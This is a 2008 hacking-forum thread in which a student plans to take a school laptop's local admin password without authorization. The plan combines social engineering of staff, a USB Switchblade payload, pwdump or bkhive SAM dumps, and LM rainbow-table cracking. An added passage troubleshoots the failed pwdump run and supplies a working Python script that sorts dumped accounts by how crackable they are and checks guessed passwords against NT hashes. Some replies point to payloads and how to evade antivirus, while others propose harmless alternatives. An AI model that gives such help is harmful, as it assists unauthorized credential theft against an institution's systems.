felony_destined Posted January 4, 2008

So, I'm first going to give the scenario here and hope that I'm not flamed, as I have read many posts looking for answers before desperately just posting my own, and this isn't exactly the most pleasant place to get help, but what tech board is? So, without further prolongment, my situation is as follows.

In school one of my teachers lets us watch movies pretty much ALL THE TIME, remotely educational ones I might add, only we have to watch them on a television. At first one might think, so what's abnormal about that? Well, nothing, except for the fact that in the classroom is a school-imaged laptop with a lovely projector. Basically, WE WANNA WATCH OUR MOVIES ON THE BIG SCREEN! :shock: The next thing you might be wondering is how on earth this is related to LM hashes. Well, here we go; the scenario as well as the attack are more than easy to understand in theory.

First, some background information: this year is a little bit different than my previous ones at this school. I was actually on the school's help desk, if you will, and therefore trusted with the admin password to all the computers. Unfortunately that program was taken out of the school, so no more students with admin privs. This presents a problem because I can't do all the things I used to be spoiled with. Now, not to stray too far away from my actual goal... to be able to watch movies on the lappy in the classroom. I noticed in the years before that we were unable to watch movies even on computers with DVD-ROMs. It didn't take me long to figure out that these banged-up XP wannabe images on the computers have the DVD-ROMs disabled in the local policy. So what do I do? I just enable them again in the Local Policy Editor... DUH! One problem with that: you need to be logged in as administrator, soooooo...

With some research, including articles, tutorials, videos, and a little self-experience, I've concluded that the most effective way to achieve knowledge of a local user's password is using rainbow tables to find an LM hash's plaintext. Now, my first approach was to use BackTrack and pwdump, BUT... the boot sequence on the machines is HD first and the BIOS is password protected. Now, if I was really desperate, yes, of course I could pull the jumper, but I mean, what are the chances of me opening up a computer in the middle of class and not getting, erm... disciplined for it? So the next thing that caught my eye was that nifty little "USB Switchblade" hack. I must say it's brilliant. I actually have downloaded and run it off my thumbdrive with success on a dummy target. Now, I understand that you need admin privileges to even get the hashes, but seeing as almost the entire school alumni knows me well as being computer knowledgeable, I'm sure getting a staff member to log in as administrator FOR me while I secretly take the hashes won't be much of a task with my cunning and social-engineering-prone personality. So here's the problem: I watched the Hak5 episode where this exploit is shown, but with the package that I downloaded (and as a matter of fact I've tried all of them) I get useless (well, not exactly useless, but not significant to my dilemma) information, for example saved browser passwords etc. All of that stuff is just lovely and was well noted for perhaps a later exploit, but all I want is some LM hashes for the local users of the system. So I'm asking this as humbly as I know how, in hopes that it is recognized and answered in the following posts: anyone got the Switchblade package with a utility that DOES grab LM hashes that I can download?

I tried making my own batch file, which is a little less stealthy but hardly suspicious to the idiots running my school; however, I'm not very successful getting pwdump to work either. =[

Thank you in advance,
A troubled teen :???:
felony_destined (Author) Posted January 4, 2008

Okay, so I mentioned in the last post that I didn't have the best luck with pwdump. When I look in the logfile, this is what I get from the SAM dump:

Logon to 127.0.0.1\ADMIN$ failed: code 53

Maybe I do have the right package installed on my drive; perhaps there's just some type of parameter missing or incorrectly typed in the bat file? I'm unsure, and not to sound impatient, but I'm getting a bit frustrated, as I already promised the teacher that I WOULD get this DVD player to work, since I already knew what the problem was from previous experience. I just can't do anything about it without admin privs. :-x
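Two practitioner notes on the posts above, followed by an added example that is not code from the thread, from pwdump or from Hak5. First, Windows error code 53 is ERROR_BAD_NETPATH ("The network path was not found"): pwdump reached the local host but could not open the ADMIN$ share on 127.0.0.1, so nothing was dumped at all; the example below starts from a dump that did succeed. Second, once a dump exists, the LM field itself tells you whether rainbow tables will help before you download a single table: XP stores an LM hash only for passwords of 14 characters or fewer and only while the NoLMHash policy is off, and a stored LM hash is two independent DES results over 7-character halves, so an unused half shows up as the well-known constant aad3b435b51404ee. The script below parses pwdump/fgdump-style lines (the user:RID:LM:NT::: layout is assumed to be what the tool wrote), classifies each account, and then shows how a candidate password is checked against the dumped NT hash offline. The sample dump is constructed: the Administrator line carries the real LM and NT hashes of the word "password"; the helpdesk and student hashes are made-up hex used only to exercise the classification. MD4 is implemented inline because hashlib frequently lacks it on OpenSSL 3 systems.

```python
"""Triage a pwdump-style SAM dump and verify candidate passwords offline.

Added example for this thread, not code from the original post or from pwdump.
Assumed input format (what pwdump/fgdump write): user:RID:LM_hash:NT_hash:::
"""
import struct

# Well-known constants, not assumptions:
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_LM_HALF = EMPTY_LM[16:]                   # one 7-byte half that was all padding
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4("") = NT hash of a blank password

# Constructed sample dump. Administrator uses the real LM/NT hashes of "password";
# the other non-empty hashes are made-up hex, present only to exercise the triage.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helpdesk:1003:aad3b435b51404eeaad3b435b51404ee:5a1b2c3d4e5f60718293a4b5c6d7e8f9:::
student:1004:6a1b9c1d2e3f4a5baad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is often missing under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                v[0] = rotl((v[0] + fn(v[1], v[2], v[3]) + X[k] + const) & mask, shifts[i % 4])
                v.insert(0, v.pop())                 # rotate so the next step updates the old d
        state = [(s + w) & mask for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, unsalted, so a dump can be checked offline."""
    return md4(password.encode("utf-16-le")).hex()


def triage_line(line: str) -> dict:
    """Classify one dump line by what the LM field tells an attacker before any cracking."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError("not a pwdump line: %r" % line)
    user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
    if lm == EMPTY_LM and nt == EMPTY_NT:
        verdict = "blank"       # empty password; nothing to crack
    elif lm == EMPTY_LM:
        verdict = "nt-only"     # NoLMHash set or password > 14 chars: LM rainbow tables are useless here
    elif lm[16:] == EMPTY_LM_HALF:
        verdict = "lm-short"    # password <= 7 chars: only the first half needs cracking
    else:
        verdict = "lm-full"     # 8..14 chars: both halves are independent 7-char problems
    return {"user": user, "rid": rid, "lm": lm, "nt": nt, "verdict": verdict}


def triage_dump(text: str) -> list:
    return [triage_line(l) for l in text.splitlines() if l.strip()]


def check_candidate(entry: dict, candidate: str) -> bool:
    """True if the candidate produces the dumped NT hash (case-sensitive, unlike LM)."""
    return nt_hash(candidate) == entry["nt"]


if __name__ == "__main__":
    rows = triage_dump(SAMPLE_DUMP)
    for row in rows:
        print("%-14s rid=%-4d %s" % (row["user"], row["rid"], row["verdict"]))
    print("Administrator is 'password':", check_candidate(rows[0], "password"))
```

The verdicts are the decision a cracker actually needs: "nt-only" accounts cannot be recovered with LM tables no matter which Switchblade payload produced the dump, "lm-short" accounts need only one half cracked (and the LM result then fixes the letters, leaving a small case-permutation search against the NT hash), and "blank" accounts need no cracking at all.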
DLSS Posted January 5, 2008

Hmm, well, I don't know what the problem is... my old non-U3 payload still grabs the hashes etc. without giving me errors, as long as the person is logged in as admin. (You can check if it's still up on the wiki; I just hope you can still get it past the virus scan.) But also, in your last post you said "I already promised the teacher that I WOULD get this DVD player to work". By that I presume you have your teacher's permission, so couldn't you just go get the head of IT (or whoever does that kind of thing there) to turn it on, log in, and make it play? Anyway, if all else fails you could try to boot a version of Linux off a stick and play the DVD using VLC... (if it'll boot off the stick...).
felony_destined (Author) Posted January 5, 2008

Thanks for that. I mean, the laptop is a pretty new model and I'm sure the BIOS supports booting from USB; however, I don't know the proper procedure for booting a Linux ISO from your thumbdrive, and even if I did... I would still need access to the BIOS to change the boot sequence, wouldn't I? And some of the movies... no, most of the movies we watch in class the principal wouldn't exactly agree with, I'm more than certain of that, so I can't exactly just get immediate clearance from anyone who knows the password to help me out. But if I did, I would still like to have the password for future troubleshooting that requires admin privs. So basically the ultimate solver of my problems would be a successful run of pwdump/fgdump, which I have not tried to run on my Switchblade yet; that will be my next trial. However, I'm unsure why pwdump won't work, though.
moonlit Posted January 5, 2008

Unplug the projector and plug in your own laptop?
felony_destined (Author) Posted January 5, 2008

Brilliant; my personal laptop, however, isn't setting foot in that school even if it grew legs, and even so, it doesn't have a DVD player in it... regretting not kicking out the extra $100 for the next model up, lol.
Jigsaw Posted January 5, 2008

Hmm... there's no video/audio output on the DVD player to the projector? I feel that this problem could be achieved without the immediate stealing of the admin password. But I do understand that future use of the admin pass would be useful.
felony_destined (Author) Posted January 5, 2008

Actually, there might be... I didn't look, but the DVD player as well as the TV are drilled to the ceiling, and I'm not sure if we even have a video/audio cord to extend that long. Thanks for your help as well, though; both of those are valid ideas as well as 'almost' effective implements. Much appreciated =]
digip Posted January 7, 2008

Is the laptop part of a domain? If so, then aren't the hashes stored as NTLM hashes (not LM hashes) on some other server for authentication, which means it should have some backup copy on the local machine if it cannot reach the domain to authenticate? (I am just guessing here, not sure.) I have never tried to rip a hash other than my own machine's, which is fairly easy with something like Cain or ophcrack, but then again you need to be able to boot from CD for ophcrack, and without the BIOS you can't choose this. Cain will (or should) set off any virus scanners upon use, so that will be a problem as well. The other option is to find the exact registry key that controls what you want and just add the key to the registry to enable/disable the settings. (This should even be possible without admin access, but I do not see that they would disable registry access from .reg files. We disable access to Regedit on our LAN, but you can still manually patch settings with .reg files, which kind of defeats the purpose of disabling access to Regedit.) Either way, you're at school. You get caught, it's on you. Be careful whatever you decide to do.
moonlit Posted January 7, 2008

I still think breaking in to the network is a little extreme for something that really has nothing to do with cracking...
felony_destined (Author) Posted January 7, 2008

lol... well, it is part of a domain, somewhat. Every student/teacher has been assigned individual usernames & passwords to authenticate EACH user, whereas before we would all sign in as username student, teacher or administrator... When logging in there is a drop-down menu that allows you to select where you would like to log in (This Computer, or the BCPS domain (Baltimore County Public Schools)). If you choose to log in to 'the computer', administrator will work; I know this only from prior experience. However, logging in with a personal authentication, it would authenticate from a huge server. I don't know how big exactly, but when I looked at how much free space I had available on my BCPS drive it was 500GB, and every user is like that, but I'm thinking it might be shared? Because 500GB * # of students in BCPS = very expensive & pointless =/
felony_destined (Author) Posted January 8, 2008

When I run

bkhive /mnt/sda1/windows/system32/config/system key

I get:

boot key: (some random hex thing)
error writing to key

Is this because the file is set to read-only or something? I'm not sure how or why that attribute might be set, as well as being put into effect, since I didn't boot from Windows; I was on BackTrack. Or is there another reason why I might be getting that error? Thoughts appreciated.